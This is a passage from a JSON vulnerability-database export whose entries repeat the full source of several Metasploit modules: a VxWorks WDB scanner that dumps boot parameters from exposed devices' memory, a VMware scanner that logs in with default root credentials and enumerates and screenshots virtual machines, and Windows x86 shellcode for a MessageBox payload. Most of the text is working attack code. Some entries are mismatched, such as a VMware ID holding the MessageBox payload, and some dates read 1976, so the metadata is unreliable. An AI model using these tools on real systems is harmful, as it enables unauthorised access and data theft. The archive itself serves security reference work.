Msf::Auxiliary\n include Msf::Exploit::Remote::WDBRPC\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VxWorks WDB Agent Boot Parameter Scanner',\n 'Description' => 'Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html'],\n ['US-CERT-VU', '362332']\n ]\n )\n\n register_options(\n [\n OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),\n Opt::RPORT(17185)\n ])\n end\n\n\n # Define our batch size\n def run_batch_size\n datastore['BATCHSIZE'].to_i\n end\n\n # Operate on an entire batch of hosts at once\n def run_batch(batch)\n\n begin\n udp_sock = nil\n idx = 0\n\n udp_sock = Rex::Socket::Udp.create(\n {\n 'Context' => {'Msf' => framework, 'MsfExploit' => self}\n }\n )\n add_socket(udp_sock)\n\n @udp_sock = udp_sock\n\n batch.each do |ip|\n\n begin\n udp_sock.sendto(create_probe(ip), ip, datastore['RPORT'].to_i, 0)\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused\n nil\n end\n\n if (idx % 10 == 0)\n while (r = udp_sock.recvfrom(65535, 0.01) and r[1])\n parse_reply(r)\n end\n end\n\n idx += 1\n end\n\n cnt = 0\n del = 10\n sts = Time.now.to_i\n while (r = udp_sock.recvfrom(65535, del) and r[1])\n parse_reply(r)\n\n # Prevent an indefinite loop if the targets keep replying\n cnt += 1\n break if cnt > run_batch_size\n\n # Escape after 15 seconds regardless of batch size\n break if ((sts + 15) < Time.now.to_i)\n\n del = 1.0\n end\n\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_status(\"Unknown error: #{e.class} #{e}\")\n ensure\n udp_sock.close if udp_sock\n end\n end\n\n #\n # The response parsers\n #\n def parse_reply(pkt)\n\n return if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n\n data = pkt[0]\n\n # Bare RPC response\n if data.length == 24\n ecode = data[20,4].unpack(\"N\")[0]\n emesg = \"unknown\"\n case ecode\n when 3\n # Should not be hit\n emesg = \"Device requires the VxWorks 5 WDB protocol\"\n when 5\n emesg = \"Device failed to parse the probe\"\n end\n\n print_status(\"#{pkt[1]} Error: code=#{ecode} #{emesg}\")\n return\n end\n\n if data.length < 80\n print_status(\"#{pkt[1]}: Unknown response #{data.unpack(\"H*\")[0]}\")\n return\n end\n\n # Memory dump response\n if data[48,64] =~ /^.{1,16}\\(\\d+,\\d+\\)/\n buff = data[48, data.length-48]\n boot,left = buff.split(\"\\x00\", 2)\n print_good(\"#{pkt[1]}: BOOT> #{boot}\")\n report_note(\n :host => pkt[1],\n :port => datastore['RPORT'],\n :proto => 'udp',\n :type => 'vxworks.bootline',\n :data => {:bootline => boot },\n :update => :unique_data\n )\n return\n end\n\n res = wdbrpc_parse_connect_reply(data)\n\n if res[:rt_membase]\n print_good(\"#{pkt[1]}: #{res[:rt_vers]} #{res[:rt_bsp_name]} #{res[:rt_bootline]}\")\n\n report_note(\n :host => pkt[1],\n :port => datastore['RPORT'],\n :proto => 'udp',\n :type => 'vxworks.target_info',\n :data => res,\n :update => :unique\n )\n\n # Send the memory dump request for the bootline. Theoretically we can infer the correct\n # location from the cpu type and BSP name, but these are tough to categorize and there\n # is no harm in trying multiple offsets\n\n # Most common mapping is 0x700 (M68k, ARM, etc)\n @udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x700, 512), pkt[1], datastore['RPORT'].to_i, 0)\n\n # PowerPC uses 0x4200\n @udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x4200, 512), pkt[1], datastore['RPORT'].to_i, 0)\n\n # PC x86 uses 0x1200\n @udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x1200, 512), pkt[1], datastore['RPORT'].to_i, 0)\n\n # SPARC-lite uses 0x600\n @udp_sock.sendto(wdbrpc_request_memread(res[:rt_membase] + 0x600, 512), pkt[1], datastore['RPORT'].to_i, 0)\n end\n end\n\n\n def create_probe(ip)\n wdbrpc_request_connect(ip)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-23T01:00:03", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-23T03:14:40", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2019-07-23T03:14:40"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6666619513896093313"]}, {"type": "threatpost", "idList": ["THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4"]}, {"type": "securelist", "idList": ["SECURELIST:CEB20E04B2F37A8904406C3A811BCF8B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112610", "OPENVAS:1361412562310891859", "OPENVAS:1361412562310891857", "OPENVAS:1361412562310891858", "OPENVAS:1361412562310704484", "OPENVAS:1361412562310891855", "OPENVAS:1361412562310891856", "OPENVAS:1361412562310142633", "OPENVAS:1361412562310142632", "OPENVAS:1361412562310142631"]}], "modified": "2019-07-23T03:14:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-23T03:14:40", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1f3319070d27778afbebe91c42ff24c6", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-15T00:09:32", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-08-15T00:09:32"}, "dependencies": {"references": [{"type": "krebs", "idList": ["KREBS:D0F8845ABB74CCE1F1153D4B578F0CB8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47250", "EDB-ID:47220"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995523"]}, {"type": "cert", "idList": ["VU:918987", "VU:605641"]}, {"type": "mskb", "idList": ["KB890830"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7"]}, {"type": "thn", "idList": ["THN:06F7E499027A9F571BB7E35498D0868E"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2143"]}, {"type": "amazon", "idList": ["ALAS-2019-1257", "ALAS-2019-1253"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:787D2196903CAB248C8CFFEE455DC9A2", "CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154017"]}, {"type": "freebsd", "idList": ["0569146E-BDEF-11E9-BD31-8DE4A4470BBB"]}, {"type": "kitploit", "idList": ["KITPLOIT:8402841988995962344"]}, {"type": "threatpost", "idList": ["THREATPOST:D6C7F34C6376E7ECB543180954D154D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142721"]}], "modified": "2019-08-15T00:09:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-15T00:09:32", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-15T02:13:29", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2019-08-15T02:13:29"}, "dependencies": {"references": [{"type": "krebs", "idList": ["KREBS:D0F8845ABB74CCE1F1153D4B578F0CB8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47250", "EDB-ID:47220"]}, {"type": "cert", "idList": ["VU:918987", "VU:605641"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995523"]}, {"type": "mskb", "idList": ["KB890830", "KB4511553", "KB4512508"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7"]}, {"type": "thn", "idList": ["THN:06F7E499027A9F571BB7E35498D0868E"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2143"]}, {"type": "amazon", "idList": ["ALAS-2019-1257", "ALAS-2019-1253"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:787D2196903CAB248C8CFFEE455DC9A2", "CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154017"]}, {"type": "freebsd", "idList": ["0569146E-BDEF-11E9-BD31-8DE4A4470BBB"]}, {"type": "kitploit", "idList": ["KITPLOIT:8402841988995962344"]}, {"type": "threatpost", "idList": ["THREATPOST:D6C7F34C6376E7ECB543180954D154D1"]}], "modified": "2019-08-15T02:13:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-15T02:13:29", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "cf1a8462dc933facff606eba49e8ba56", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows MessageBox", "description": "Spawns a dialog via MessageBox using a customizable title, text & icon\n", "published": "2010-09-27T13:31:48", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-28T08:04:02", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-08-28T08:04:02"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704509", "OPENVAS:1361412562310704501", "OPENVAS:1361412562310704508", "OPENVAS:1361412562310704506", "OPENVAS:1361412562310891898", "OPENVAS:1361412562310142803", "OPENVAS:1361412562310142802", "OPENVAS:1361412562310142792", "OPENVAS:1361412562310891897", "OPENVAS:1361412562310891896"]}, {"type": "ics", "idList": ["ICSA-19-239-02"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995673"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154219"]}, {"type": "mskb", "idList": ["KB4512486"]}], "modified": "2019-08-28T08:04:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/messagebox.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n\n CachedSize = 272\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows MessageBox',\n 'Description' => 'Spawns a dialog via MessageBox using a customizable title, text & icon',\n 'Author' =>\n [\n 'corelanc0d3r <peter.ve[at]corelan.be>', # original payload module\n 'jduck' # some ruby factoring\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n ))\n\n # Register MessageBox options\n register_options(\n [\n OptString.new('TITLE', [ true, \"Messagebox Title (max 255 chars)\", \"MessageBox\" ]),\n OptString.new('TEXT', [ true, \"Messagebox Text (max 255 chars)\", \"Hello, from MSF!\" ]),\n OptString.new('ICON', [ true, \"Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION\", \"NO\" ])\n ])\n end\n\n #\n # Construct the payload\n #\n def generate\n\n strTitle = datastore['TITLE'] + \"X\"\n if (strTitle.length < 1)\n raise ArgumentError, \"You must specify a title\"\n end\n if (strTitle.length >= 256)\n raise ArgumentError, \"The title must be less than 256 characters long.\"\n end\n\n strText = datastore['TEXT'] + \"X\"\n if (strText.length < 1)\n raise ArgumentError, \"You must specify the text of the MessageBox\"\n end\n if (strText.length >= 256)\n raise ArgumentError, \"The text must be less than 256 characters long.\"\n end\n\n # exitfunc process or thread ?\n stackspace = \"0x04\"\n funchash = \"\"\n doexitseh = \"\"\n case datastore['EXITFUNC'].upcase.strip\n when 'PROCESS'\n stackspace = \"0x08\"\n funchash = \"0x73E2D87E\"\n when 'THREAD'\n stackspace = \"0x08\"\n funchash = \"0x60E0CEEF\"\n end\n\n # create exit routine for process / thread\n getexitfunc = <<EOS\n ;base address of kernel32 will be at esp,\n mov ebx,#{funchash}\n xchg ebx, dword [esp]\n push edx\n call find_function\n ;store function address at ebx+08\n mov [ebp+0x8],eax\nEOS\n\n doexit = <<EOS\n xor eax,eax\t\t;zero out eax\n push eax\t\t;put 0 on stack\n call [ebp+8]\t;ExitProcess/Thread(0)\nEOS\n\n # if exit is set to seh or none, overrule\n if datastore['EXITFUNC'].upcase.strip == \"SEH\"\n # routine to exit via exception\n doexit = <<EOS\n xor eax,eax\n call eax\nEOS\n getexitfunc = ''\n elsif datastore['EXITFUNC'].upcase.strip == \"NONE\"\n doexit = <<-EOS\n nop\n EOS\n getexitfunc = ''\n end\n\n # Generate code to get ptr to Title\n marker_idx = strTitle.length - 1\n strPushTitle = string_to_pushes(strTitle, marker_idx)\n # generate code to write null byte\n strWriteTitleNull = \"xor ebx,ebx\\n\\tmov [esp+0x#{marker_idx.to_s(16)}],bl\\n\\tmov ebx,esp\\n\\t\"\n\n #================Process Text===============================\n marker_idx = strText.length - 1\n strPushText = string_to_pushes(strText, marker_idx)\n strWriteTextNull = \"xor ecx,ecx\\n\\tmov [esp+0x#{marker_idx.to_s(16)}],cl\\n\\tmov ecx,esp\\n\\t\"\n\n # generate code to set messagebox icon\n setstyle = \"push edx\\n\\t\"\n case datastore['ICON'].upcase.strip\n #default = NO\n when 'ERROR'\n setstyle = \"push 0x10\\n\\t\"\n when 'QUESTION'\n setstyle = \"push 0x20\\n\\t\"\n when 'WARNING'\n setstyle = \"push 0x30\\n\\t\"\n when 'INFORMATION'\n setstyle = \"push 0x40\\n\\t\"\n end\n\n #create actual payload\n payload_data = <<EOS\n ;getpc routine\n fldpi\n fstenv [esp-0xc]\n xor edx,edx\n mov dl,0x77\t;offset to start_main\n\n;get kernel32\n xor ecx,ecx\n mov esi, [fs:ecx + 0x30]\n mov esi, [esi + 0x0C]\n mov esi, [esi + 0x1C]\nnext_module:\n mov eax, [esi + 0x08]\n mov edi, [esi + 0x20]\n mov esi, [esi]\n cmp [edi + 12*2], cl\n jne next_module\n\n pop ecx\n add ecx,edx\n jmp ecx ;jmp start_main\n\nfind_function:\n pushad\t\t\t\t;save all registers\n mov ebp, [esp + 0x24]\t;put base address of module that is being loaded in ebp\n mov eax, [ebp + 0x3c]\t;skip over MSDOS header\n mov edx, [ebp + eax + 0x78]\t;go to export table and put relative address in edx\n add edx, ebp\t\t\t;add base address to it.\n ;edx = absolute address of export table\n mov ecx, [edx + 0x18]\t\t;set up counter ECX\n ;(how many exported items are in array ?)\n mov ebx, [edx + 0x20]\t\t;put names table relative offset in ebx\n add ebx, ebp\t\t\t;add base address to it.\n ;ebx = absolute address of names table\n\nfind_function_loop:\n jecxz find_function_finished ;if ecx=0, then last symbol has been checked.\n ;(should never happen)\n ;unless function could not be found\n dec ecx\t\t\t\t;ecx=ecx-1\n mov esi, [ebx + ecx * 4]\t;get relative offset of the name associated\n ;with the current symbol\n ;and store offset in esi\n add esi, ebp\t\t\t;add base address.\n ;esi = absolute address of current symbol\n\ncompute_hash:\n xor edi, edi\t\t\t;zero out edi\n xor eax, eax\t\t\t;zero out eax\n cld\t\t\t\t\t;clear direction flag.\n ;will make sure that it increments instead of\n ;decrements when using lods*\n\ncompute_hash_again:\n lodsb\t\t\t\t\t;load bytes at esi (current symbol name)\n ;into al, + increment esi\n test al, al\t\t\t\t;bitwise test :\n ;see if end of string has been reached\n jz compute_hash_finished\t;if zero flag is set = end of string reached\n ror edi, 0xd\t\t\t;if zero flag is not set, rotate current\n ;value of hash 13 bits to the right\n add edi, eax\t\t\t;add current character of symbol name\n ;to hash accumulator\n jmp compute_hash_again\t\t;continue loop\n\ncompute_hash_finished:\n\nfind_function_compare:\n cmp edi, [esp + 0x28]\t;see if computed hash matches requested hash\n ; (at esp+0x28)\n ;edi = current computed hash\n ;esi = current function name (string)\n jnz find_function_loop\t\t;no match, go to next symbol\n mov ebx, [edx + 0x24]\t;if match : extract ordinals table\n ;relative offset and put in ebx\n add ebx, ebp\t\t\t;add base address.\n ;ebx = absolute address of ordinals address table\n mov cx, [ebx + 2 * ecx]\t;get current symbol ordinal number (2 bytes)\n mov ebx, [edx + 0x1c]\t;get address table relative and put in ebx\n add ebx, ebp\t\t\t;add base address.\n ;ebx = absolute address of address table\n mov eax, [ebx + 4 * ecx]\t;get relative function offset from its ordinal\n ;and put in eax\n add eax, ebp\t\t\t;add base address.\n ;eax = absolute address of function address\n mov [esp + 0x1c], eax\t;overwrite stack copy of eax so popad\n ;will return function address in eax\nfind_function_finished:\n popad \t\t\t\t;restore original registers.\n ;eax will contain function address\n ret\n\nstart_main:\n mov dl,#{stackspace}\n sub esp,edx\t\t;allocate space on stack\n mov ebp,esp\t\t;set ebp as frame ptr for relative offset\n mov edx,eax\t\t;save base address of kernel32 in edx\n\n push 0xEC0E4E8E\t;get LoadLibrary function ptr\n push edx\n call find_function\n ;put function address on stack (ebx+04)\n mov [ebp+0x4],eax\n #{getexitfunc}\t\t;optionally get selected exit function ptr\n\n ;put pointer to string user32.dll to stack\n push 0x41206c6c\n push 0x642e3233\n push 0x72657375 \t;user32.dll\n xor bl,bl ;make sure we have a null byte\n mov [esp+0xA],bl\t\t;null byte\n mov esi,esp\t\t\t;put pointer to string on top of stack\n push esi\n call [ebp+0x4]\t\t;call LoadLibrary\n ; base address of user32.dll is now in eax (if loaded correctly)\n mov edx,eax\t\t\t;put ptr in edx\n push eax\t\t\t;put it on stack as well\n ;find the MessageBoxA function\n mov ebx, 0xBC4DA2A8\n xchg ebx, dword [esp] ;esp = base address of user32.dll\n push edx\n call find_function\n ;function address should be in eax now\n ;we'll keep it there\n ;get pointer to title\n #{strPushTitle}\n #{strWriteTitleNull}\t;ebx will point to title\n ;get pointer to text\n #{strPushText}\n #{strWriteTextNull}\t;ecx will point to text\n\n;now push parameters to the stack\n xor edx,edx\t\t;zero out edx\n #{setstyle}\t\t;set button/iconstyle on stack\n push ebx\t\t;put pointer to Title on stack\n push ecx\t\t;put pointer to Text on stack\n push edx\t\t;put 0 on stack (hWnd)\n call eax\t\t;call MessageBoxA(hWnd,Text,Title,Style)\n\n;EXITFUNC\n #{doexit}\nEOS\n self.assembly = payload_data\n super\n end\n\n #\n # Turn the provided string into a serious of pushes\n #\n def string_to_pushes(str, marker_idx)\n # Align string to 4 bytes\n rem = (marker_idx+1) % 4\n if (rem > 0)\n str << \" \" * (4 - rem)\n end\n\n # string is now 4 byte aligned and ends with 'X' at index 'marker_idx'\n\n # push string to stack, starting at the back\n pushes = ''\n while (str.length > 0)\n four = str.slice!(-4, 4)\n dw = four.unpack('V').first\n pushes << \"push 0x%x\\n\\t\" % dw\n end\n\n pushes\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-28T08:04:02", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-28T11:10:11", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-08-28T11:10:11"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704508", "OPENVAS:1361412562310704509", "OPENVAS:1361412562310704501", "OPENVAS:1361412562310142804", "OPENVAS:1361412562310113465", "OPENVAS:1361412562310113467", 